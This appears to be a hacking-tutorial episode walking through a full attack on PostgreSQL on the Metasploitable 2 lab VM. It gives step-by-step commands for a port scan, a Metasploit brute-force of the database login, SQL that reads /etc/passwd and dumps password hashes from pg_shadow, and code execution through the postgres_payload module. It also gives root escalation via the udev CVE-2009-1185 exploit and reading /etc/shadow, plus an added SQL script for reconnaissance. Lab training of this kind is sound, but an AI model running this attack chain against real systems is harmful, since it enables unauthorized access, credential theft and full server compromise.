#HackOnTuesday Episode 4 Exploiting Common PostgreSQL Vulnerabilities to Hack a Linux Server

Among the many object-relational database management systems (ORDBMS) in use today, one of the most popular is PostgreSQL. PostgreSQL, often referred to as Postgres, is an open-source ORDBMS that supports almost all SQL constructs. In this episode, Gianni shows how to attack a PostgreSQL instance on Metasploitable 2: brute-force the database login, read and write files on the server through SQL, abuse a writable /tmp directory and the ability to load user-defined functions to get code execution as the postgres user, and finally get root by exploiting a Linux kernel/udev vulnerability.

Tools, Scripts, and Exploits

Steps

» Identify the listening services on the target machine
   • nmap -v -sV 192.168.75.149 -p-
» Brute-force the Postgres login (the module's default wordlists include the postgres/postgres pair)
   • msfconsole
   • use auxiliary/scanner/postgres/postgres_login
   • set RHOSTS 192.168.75.149
   • run
» Connect to the database and gather information
   • psql -h 192.168.75.149 -U postgres -W # password = postgres
   • SELECT VERSION();
   • SELECT usename, passwd FROM pg_shadow;
   • Test whether you can read files from the server's filesystem (COPY FROM a server file runs as the database's OS user and requires a superuser account, which the default postgres user is)
      - CREATE TABLE myfile (input TEXT);
      - COPY myfile FROM '/etc/passwd';
      - SELECT input FROM myfile;
   • Test whether you can write files in /tmp (this is the condition the postgres_payload module relies on)
      - CREATE TABLE testfile (output TEXT);
      - INSERT INTO testfile(output) VALUES ('test');
      - COPY testfile(output) TO '/tmp/testfile';
      - On the Metasploitable VM, check that the file was created
         - log in with msfadmin/msfadmin
         - ls -l /tmp
         - cat /tmp/testfile
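The following SQL is an added example, not a script from the episode; it bundles the information gathering and the read/write tests above into one psql session and adds the checks a practitioner wants before moving on to code execution. It assumes the postgres/postgres login recovered by the brute-force step, the PostgreSQL 8.3 server shipped with Metasploitable 2 running as the OS user postgres, and a /tmp the server can write to; the table names myfile, testfile and readback are arbitrary.

```sql
-- Added example (not the episode's own script). Run inside:
--   psql -h 192.168.75.149 -U postgres -W
-- Assumes PostgreSQL 8.3 on Metasploitable 2, login postgres/postgres.

-- 1. Who are we? COPY FROM/TO a server-side file is superuser-only in 8.x
--    (PostgreSQL 11+ also accepts the pg_read_server_files and
--    pg_write_server_files roles), so check this before anything else.
SELECT current_user,
       usesuper  AS is_superuser,
       version() AS server_version
FROM   pg_user
WHERE  usename = current_user;

-- 2. Stored credentials (md5 hashes in 8.x) for offline cracking or reuse
--    against other services on the same host.
SELECT usename, passwd, valuntil FROM pg_shadow;

-- 3. Read a file: COPY in text format yields one row per line. The default
--    column delimiter is a tab, so a file containing tabs must be loaded
--    with a DELIMITER that does not occur in it; /etc/passwd has none.
DROP TABLE IF EXISTS myfile;
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile WHERE input LIKE '%:0:0:%';   -- uid 0 accounts

-- 4. Write test: drop a timestamped marker in /tmp, then read it back with
--    COPY FROM so the check does not need a shell on the target.
DROP TABLE IF EXISTS testfile;
CREATE TABLE testfile (output TEXT);
INSERT INTO testfile(output) VALUES ('test ' || now()::text);
COPY testfile(output) TO '/tmp/testfile';

DROP TABLE IF EXISTS readback;
CREATE TABLE readback (line TEXT);
COPY readback FROM '/tmp/testfile';
SELECT line FROM readback;   -- should echo the marker row written above

-- 5. Tidy up the scratch tables (the file in /tmp stays; remove it from
--    the shell once you have one).
DROP TABLE myfile;
DROP TABLE testfile;
DROP TABLE readback;
```

If step 4 fails, exploit/linux/postgres/postgres_payload will fail for the same reason: the module writes a shared object into /tmp through the large-object tables and then loads it with CREATE FUNCTION ... LANGUAGE C, so it needs exactly the superuser rights and writable /tmp these queries verify. On PostgreSQL 9.3 and later, COPY ... TO PROGRAM 'command' gives a superuser command execution directly from SQL, but that syntax does not exist on the 8.3 server targeted here.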
» Use Metasploit's postgres_payload module to get code execution as the postgres user (it uploads a shared library to /tmp and loads it as a user-defined function)
   • msfconsole
   • use exploit/linux/postgres/postgres_payload
   • show options
   • set RHOSTS 192.168.75.149 # RHOST on older Metasploit releases
   • exploit
   • sysinfo
» Escalate to root (Metasploitable 2 ships a udev vulnerable to the netlink message origin check flaw, CVE-2009-1185)
   • background
   • use exploit/linux/local/udev_netlink
   • show options
   • set SESSION 1
   • exploit
   • getuid # the new session should report root
   • shell
   • whoami
   • cat /etc/shadow
» Game over!